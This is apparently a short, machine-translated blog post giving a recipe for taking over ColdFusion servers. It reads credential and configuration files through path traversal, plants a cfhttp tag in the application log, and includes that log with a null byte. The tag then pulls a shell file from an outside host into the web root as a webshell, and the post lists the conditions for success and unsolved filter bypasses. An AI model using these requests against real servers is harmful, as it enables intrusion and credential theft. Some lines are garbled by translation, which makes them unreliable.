1. Read the sensitive metabase. xml/web. xml/password. properities file and find the www path, coldfusion Path, and coldfusion background encryption password.
2. Local coldfusion logs are contained. Write a cfm statement to get WEBSHELL.
Http://www.bkjia.com/index. cfm? Action = .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /CFusionMX7/logs/application. log % 00
Http://www.bkjia.com/index. cfm? Action = <cfhttp method = Get URL = # URL. u # PATH = # URL. p # FILE = # URL. f #>
Http://www.bkjia.com/index. cfm? Action =... \ application. log % 00 & u = http://www.pentest.cc/shell.txt&p;c:?inetpub=wwwroot=&f=shell.cfm
Successful conditions:
1. writable WEB directory
2. the coldfusion directory and the web directory are in the same partition.
3. A group of cool people
Unsolved problems:
1. iis logs will convert spaces to +. I don't know how to bypass it.
2. coldfusion will double single quotation marks and double quotation marks. I don't know how to bypass it. (The master also encountered this problem. Haha)
From mickey's blog